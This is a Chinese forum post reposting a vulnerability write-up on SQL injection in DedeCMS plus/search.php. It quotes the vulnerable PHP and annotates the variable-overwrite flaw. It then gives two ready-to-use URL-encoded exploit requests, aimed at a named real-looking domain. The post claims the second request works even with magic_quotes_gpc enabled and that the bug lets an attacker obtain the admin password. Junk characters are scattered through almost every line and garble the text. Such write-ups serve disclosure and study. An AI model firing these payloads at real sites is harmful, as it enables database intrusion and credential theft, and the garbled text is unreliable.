微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.6 Z9 g! g8 }- A4 Y5 ?
作者: c4rp3nt3r@0x50sec.org1 @1 `% E! {2 E' g: k
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
8 Q. v$ K! B- X9 e8 I: Y( a# n
$ I2 s H6 `% t3 q* A. t黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
7 b6 j: u5 g' P , v8 { f* i' l# M( |
============+ d' Q# |, h4 W1 k1 L1 t
3 C; R' F( T4 x* L3 S. R 1 N0 U) U" H( K7 ^: U6 t
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码." H) _7 e7 _8 J
/ _9 p/ p8 j5 F8 ?" f( U6 v
require_once(dirname(__FILE__).”/../include/common.inc.php”);
+ t+ \8 k) k7 wrequire_once(DEDEINC.”/arc.searchview.class.php”);
! U! U0 M7 S$ c3 e 9 E' x4 p; o% ]# j. s
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;; C, O C0 Q( Z
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
& t- E, g4 \) b- z E0 K$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
+ m4 J- I X4 C+ X3 q. H1 N$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;9 W! I& R X: [$ N! O
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
4 _7 G( v6 r1 h
" L: |' B8 ?' f0 [' L4 t/ b G" zif(!isset($orderby)) $orderby=”;
) R( @2 J# W1 e) Uelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);( s6 D7 H1 V+ x
/ H1 z7 ~! I8 `! R
" S& ^% J( R. e0 jif(!isset($searchtype)) $searchtype = ‘titlekeyword’;! `% O, G: m4 ]) e
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
6 h. m% C; d8 E* Z ; V( o- \/ M. x5 Q! I s/ P, @
if(!isset($keyword)){
/ q% D* j2 K- o8 `9 x if(!isset($q)) $q = ”;6 A2 K2 m5 K7 x5 v/ H# [
$keyword=$q;; I- _: t* ^# U6 m7 h
}
% A9 A; R1 N0 y 7 L) E) Z% |, u5 @1 o2 X. N5 A
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));+ C) R, x) O+ y: t+ e2 W& \
2 M* b0 ]; x; g
//查找栏目信息
7 r# c' q4 b4 `if(empty($typeid)). l) z% J4 C" q" g7 R
{- j" o/ z% H/ @
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;+ ^% c: @0 O, U5 @7 ^( W: s
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )% e) I) e0 M7 Q0 K0 D
{
6 N* C Z/ O" ~ $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
1 _: x) f+ u4 Y3 ?7 E fwrite($fp, “<”.”?php\r\n”);
4 c7 p* d6 Y9 i8 N- c/ m $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);$ C- @* O& k5 `6 o
$dsql->Execute();6 }% C5 R- |% P$ {
while($row = $dsql->GetArray())" T7 u0 [ b6 w$ E# s% {. W. Y" O
{
1 h6 ~9 O. R2 V" R fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);/ J/ \6 z. Y8 A& c, v# B U/ a4 x
}
/ t; `+ s7 F, [( F fwrite($fp, ‘?’.'>’);
: s; U4 K1 P) S2 u: r fclose($fp);1 b) C6 {* K- |' A8 T
}
3 w' g+ r& K$ U8 L, k* h [% U9 v% } //引入栏目缓存并看关键字是否有相关栏目内容$ [$ i! g( Q9 Z& J
require_once($typenameCacheFile);
\4 J% |2 _$ X. n3 U1 ~% Y//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个. e3 ^1 q8 r7 s
//
" m7 E4 z/ ]" q% L: x if(isset($typeArr) && is_array($typeArr))# X" Y* }" `6 j* t" W! D0 u
{/ f3 T# c3 D$ Q2 ^3 X/ F
foreach($typeArr as $id=>$typename)
% B; V- M7 [8 _3 t) S: ~5 S {- A, w0 L/ B5 }
# H. N3 ^+ p+ e3 A" a <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
! c. z, \( [, F0 A0 A if($keyword != $keywordn)# Y' y% i6 ]8 O& p9 @' f0 k8 `3 k2 J+ ]
{
! h# { N1 a4 E+ \- }" F3 Q0 d $keyword = $keywordn;
# b. K2 e m7 v <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
G) @" k. q a- x( O2 x break;
+ [$ w5 V# r g+ m }! k) E( M9 p# ]/ W6 A0 ^
}
4 ^( @- j) z! }, V/ l6 P/ j' j }
3 B2 d2 A' f* K9 s4 d! J% P& x1 d- y$ b}
& t& ]+ P+ x9 [& n然后plus/search.php文件下面定义了一个 Search类的对象 .
! ~, N9 n. s/ p. I0 V% X I6 \. m+ y在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
6 e: p* K. y. X$ p" S8 ~$this->TypeLink = new TypeLink($typeid);! ^, H# O9 {4 b1 R0 v! m. F D# k# d
! @% Q+ q' b2 V8 P. BTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.& {2 _4 ]8 M w9 x9 {7 M- c
& r$ n: T8 ^9 N5 y3 Tclass TypeLink+ c8 O. S1 ?' u% ^& d! \9 O L
{4 z: P0 s- }$ r$ N+ ~
var $typeDir;
% b5 Q( ?) Z8 {1 k3 w* T/ z1 e var $dsql;6 p, f5 k) ~+ i' z. N9 F! N
var $TypeID;
) E/ K/ i' E( n' `) w; f( k% H( \ var $baseDir;
3 N: V8 T; I r2 Q' S5 ] var $modDir; U( E4 z9 t2 \4 [/ P
var $indexUrl;
# x4 k$ \9 D$ w4 q3 B# z' n) F, J' D! O var $indexName;
, q. M1 f0 Z+ I' d+ u) m0 q var $TypeInfos;
3 N: E9 b' @7 H" m' t& K+ x var $SplitSymbol;
) m* R/ Q& {0 f- a var $valuePosition;. P) i4 T& b$ @; q9 g4 r. m
var $valuePositionName;* ~2 U. _+ e7 @/ @3 ?8 X
var $OptionArrayList;//构造函数///////. [0 u5 G0 ]1 i
//php5构造函数
$ g V9 t9 U2 ?7 ?0 g4 v function __construct($typeid)
$ f% s5 W" m/ y9 _8 i! o% M& h. h {
8 O( q+ p5 J$ M0 m5 s; _+ o5 Q+ Q1 r $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];0 i8 V/ D/ y; ]/ Z* x: {
$this->indexName = $GLOBALS['cfg_indexname'];
$ e1 W z! @3 K, m- r ? b9 r2 w( O $this->baseDir = $GLOBALS['cfg_basedir'];
3 U& z8 q/ |& z G2 w $this->modDir = $GLOBALS['cfg_templets_dir'];9 G8 f. R5 V$ }3 o3 {
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
5 v, j2 F% S; S, q $this->dsql = $GLOBALS['dsql'];6 y% y: c2 M4 i. \+ |. P+ K, [% d
$this->TypeID = $typeid;- s- t- ?- P) z) @; |& u/ q
$this->valuePosition = ”;
- H; s, L1 \* w) I $this->valuePositionName = ”;
( j8 {& |% b' Z' K* |; } $this->typeDir = ”;
4 f9 ?$ b, Q. r8 D $this->OptionArrayList = ”;
/ ?; k; ~5 w3 [& X6 P , R7 z; ]' k" |
//载入类目信息
! j0 w6 J& ~1 @% j4 `& K& G' b ! d5 D j7 b: X7 a
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
0 y' m: q; K6 c6 ]ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
. |0 g$ n! Q" c0 ~0 x`#@__channeltype` ch4 d* K! X* c# @ j4 N6 h6 q0 L S
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿% i/ Y. g3 M* f% R
2 g4 X9 ~0 a% o) a. @' t if($typeid > 0)3 R Q. B {9 k n2 b1 W+ v7 |
{
6 Z2 P: H& q3 B* G4 K $this->TypeInfos = $this->dsql->GetOne($query);) ^6 G9 Y x ^+ V; }7 Z# d
利用代码一 需要 即使magic_quotes_gpc = Off, f5 Y. j4 \, m9 n) a
* G3 l4 R# ]* k. U) wwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title) E" ?8 q. b2 R) h1 A: C; S" `) H2 N0 D
3 ]% E7 B' @% d: i
这只是其中一个利用代码… Search 类的构造函数再往下
' Q- } s. i$ A, p' c9 }
; W1 U. O. l! i/ v……省略
9 Y: F. g( R/ r: N6 z# @1 O, ~$this->TypeID = $typeid;6 _$ k& O9 Q& p3 U* b3 @2 _/ D
……省略
/ \8 \: b$ x* ?( @6 H+ ?: { z; eif($this->TypeID==”0″){# u' \, O; m* c1 V; f$ H4 k
$this->ChannelTypeid=1;
m# @# s4 U& ~& d) g, X }else{- L% J2 T4 I- f Q
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
2 W9 Y$ F4 J# d5 y5 i S. ^/ {//现在不鸡肋了吧亲…# [5 c( D* T/ B. H
$this->ChannelTypeid=$row['channeltype'];. r* b- h1 @4 A6 d6 R; z' H+ B8 {: W
6 k8 P' w& R' f$ D- D G }
3 c3 v u. l0 n7 K4 ^& U# y8 }利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.- z9 }& l; ]" s7 _
2 h; w! r& [" t, y9 u' X% r$ |4 Owww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
+ N1 @# f3 z. G- B1 Y: e6 s+ A5 q6 y
9 x" d8 g9 W! F ~9 U如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站) g4 i; p& h" ^
|
发表于 2013-1-19 08:18:56
收藏
支持
反对